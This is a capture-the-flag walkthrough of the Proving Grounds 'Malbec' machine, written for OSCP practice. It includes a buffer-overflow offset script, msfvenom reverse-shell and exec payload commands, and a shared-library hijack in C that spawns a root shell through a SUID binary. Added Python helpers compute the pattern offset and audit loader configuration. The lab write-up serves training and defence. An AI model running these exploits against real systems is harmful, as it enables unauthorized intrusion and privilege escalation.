Proving Grounds: Malbec

Al1z4deh:~# echo "Welcome"
5 min read · Dec 10, 2022


Today we will take a look at Proving Grounds: Malbec. My purpose in sharing this post is to prepare for the OSCP exam, and also to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 carlos carlos 108304 Jan 25 2021 malbec.exe [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.200.129:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
7138/tcp open unknown
  • FTP
┌──(root㉿kali)-[~/ctf]
└─# ftp 192.168.200.129 2121
Connected to 192.168.200.129.
220 pyftpdlib 1.5.6 ready.
Name (192.168.200.129:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||46511|).
150 File status okay. About to open data connection.
-rwxrwxrwx 1 carlos carlos 108304 Jan 25 2021 malbec.exe
226 Transfer complete.
ftp> mget malbec.exe
mget malbec.exe [anpqy?]? y
229 Entering extended passive mode (|||59881|).
150 File status okay. About to open data connection.
100% |************************************************************************************************************************************************| 105 KiB 363.41 KiB/s 00:00 ETA
226 Transfer complete.
108304 bytes received in 00:00 (363.28 KiB/s)
ftp> exit
221 Goodbye.

Running the .exe file opens port 7138, which matches the open port the scan found on the target machine.

I transferred this file to my Windows machine and tested it.

And the result: a buffer overflow. Here I want to share with you two resources that I use.

Pay attention to every detail.

┌──(root㉿kali)-[~/ctf]
└─# msf-pattern_create -l 888
┌──(root㉿kali)-[~/ctf]
└─# msf-pattern_offset -l 888 -q 6C41336C
[*] Exact match at offset 340
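How the offset 340 falls out of the EIP value, as an added example (my own Python, not the author's code and not Metasploit's): the cyclic pattern is built from Upper+lower+digit triples, and the register value shown by the debugger is undone from x86 little-endian byte order before it is searched for in the pattern.

```python
import string
import struct

def msf_pattern(length):
    """Metasploit-style cyclic pattern Aa0Aa1...Aa9Ab0... cut to `length` bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # pattern exhausted (max 20280 bytes)

def eip_to_bytes(eip_hex):
    """The debugger shows EIP as a number; x86 is little-endian, so the four
    bytes that overwrote it sit in memory in the reverse order."""
    return struct.pack("<I", int(eip_hex, 16)).decode("ascii")

def pattern_offset(eip_hex, length):
    """Offset of the bytes now in EIP within a pattern of `length`, or -1.
    For 6C41336C the memory bytes are 'l3Al', which sit at offset 340."""
    pattern = msf_pattern(length)
    return pattern.find(eip_to_bytes(eip_hex))

if __name__ == "__main__":
    print(pattern_offset("6C41336C", 888))   # 340, as in the writeup
```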

┌──(root㉿kali)-[~/ctf]
└─# cat buffer2.py
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(('192.168.79.137', 7138))

# 340 bytes of padding reach the saved return address (offset found with
# msf-pattern_offset above); the four B's should then show up in EIP as 0x42424242
data = "A"*340 + "B"*4
s.send(data.encode())   # bytes on the wire under both Python 2 and 3

s.close()

┌──(root㉿kali)-[~/ctf]
└─# python2.7 buffer2.py
msfvenom -a x86 -p windows/exec CMD=calc.exe -f c -b '\x00'

(I forgot to turn off the voice.) Please consider turning down the volume, and I'm sorry for bothering you. 🤝

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.200 LPORT=2121 -f c -b '\x00' EXITFUNC=thread
  • Privilege escalation
carlos@malbec:/home/carlos$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/messenger
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd

An interesting binary is /usr/bin/messenger.

carlos@malbec:/home/carlos$ /usr/bin/messenger
/usr/bin/messenger: error while loading shared libraries: libmalbec.so: cannot open shared object file: No such file or directory

The binary reports that the shared library libmalbec.so could not be found.
We can confirm this with ldd.

carlos@malbec:/home/carlos$ ldd /usr/bin/messenger
linux-vdso.so.1 (0x00007ffc377f3000)
libmalbec.so => not found
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5142676000)
/lib64/ld-linux-x86-64.so.2 (0x00007f514284c000)

The dynamic loader's extra search directories are configured under /etc/ld.so.conf.d/, where a malbec.conf file stands out:

carlos@malbec:/home/carlos$ ls -l /etc/ld.so.conf.d/
total 20
-rw-r--r-- 1 root root 38 Jun 25 2018 fakeroot-x86_64-linux-gnu.conf
-rw-r--r-- 1 root root 168 May 1 2019 i386-linux-gnu.conf
-rw-r--r-- 1 root root 44 Mar 20 2016 libc.conf
-rw-r--r-- 1 root root 14 Jan 26 04:43 malbec.conf
-rw-r--r-- 1 root root 100 May 1 2019 x86_64-linux-gnu.conf

carlos@malbec:/home/carlos$ cat /etc/ld.so.conf.d/malbec.conf
/home/carlos/
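
From the defender's side, the root cause is a loader search path in /etc/ld.so.conf.d/ that points into a user's home directory, which a SUID root binary then trusts. Below is an added Python audit (my own example, not from the box or the author) that parses those .conf files and flags search directories that live under /home, are not root-owned, or are writable by group or others; demo() rebuilds the malbec.conf layout in a constructed temporary directory instead of touching the real system.

```python
import glob
import os
import stat
import tempfile

def parse_ld_conf_dir(conf_dir):
    """(conf_file, directory) for every search path listed in *.conf files."""
    entries = []
    for conf in sorted(glob.glob(os.path.join(conf_dir, "*.conf"))):
        with open(conf) as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith(("#", "include")):
                    entries.append((conf, line))
    return entries

def unsafe_reasons(directory):
    """Why the loader must not search this directory; [] if it looks fine."""
    reasons = []
    if directory.rstrip("/").startswith("/home/"):
        reasons.append("lives under /home")       # the Malbec misconfiguration
    try:
        st = os.stat(directory)
    except FileNotFoundError:
        return reasons + ["does not exist"]       # creatable by the parent's owner
    if st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("writable by group or others")
    return reasons

def audit(conf_dir="/etc/ld.so.conf.d"):
    # risky directory -> (conf file that adds it, reasons)
    findings = {}
    for conf, directory in parse_ld_conf_dir(conf_dir):
        reasons = unsafe_reasons(directory)
        if reasons:
            findings[directory] = (conf, reasons)
    return findings

def demo():
    # constructed stand-in for the box: malbec.conf pointing at a user-writable dir
    root = tempfile.mkdtemp()
    conf_dir = os.path.join(root, "ld.so.conf.d")
    libdir = os.path.join(root, "home", "carlos")   # plays the role of /home/carlos
    os.makedirs(conf_dir)
    os.makedirs(libdir)
    os.chmod(libdir, 0o777)                         # user-controlled search path
    with open(os.path.join(conf_dir, "malbec.conf"), "w") as fh:
        fh.write(libdir + "/\n")
    return audit(conf_dir)
```

Run audit() with its default argument on a real host to list every loader search directory that fails these checks.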
carlos@malbec:/home/carlos$ strings /usr/bin/messenger
-------------------
__gmon_start__
malbec // The malbec string appears a couple of times in the output
__libc_start_main
libmalbec.so
...
_ITM_registerTMCloneTable
malbec // The malbec string appears a couple of times in the output

Create a payload

carlos@malbec:/home/carlos$ nano root.c
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>     /* setuid(), setgid() */

/* messenger imports the symbol malbec from libmalbec.so (see the strings
   output above), so a library defining it is loaded from /home/carlos/ */
void malbec() {
    setuid(0); setgid(0); system("/bin/bash");
}
carlos@malbec:/home/carlos$ gcc root.c -o libmalbec.so -shared -fPIC -w
gcc: error trying to exec ‘cc1’: execvp: No such file or directory

The PATH variable has not been exported, so gcc cannot find cc1.
To fix this, we export the variable.

carlos@malbec:/home/carlos$ export
declare -x LS_COLORS=""
declare -x OLDPWD
declare -x PWD="/home/carlos"
declare -x SHLVL="1"
declare -x TERM="xterm"

carlos@malbec:/home/carlos$ export PATH

carlos@malbec:/home/carlos$ export
declare -x LS_COLORS=""
declare -x OLDPWD
declare -x PATH="/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:."
declare -x PWD="/home/carlos"
declare -x SHLVL="1"
declare -x TERM="xterm"

Compile

carlos@malbec:/home/carlos$ gcc root.c -o libmalbec.so -shared -fPIC -w

carlos@malbec:/home/carlos$ ldd /usr/bin/messenger
linux-vdso.so.1 (0x00007fff9d1b0000)
libmalbec.so => /home/carlos/libmalbec.so (0x00007f72ea20d000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f72ea04c000)
/lib64/ld-linux-x86-64.so.2 (0x00007f72ea227000)

Root

carlos@malbec:/home/carlos$ whoami
carlos
carlos@malbec:/home/carlos$ /usr/bin/messenger
root@malbec:/home/carlos# whoami
root

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."
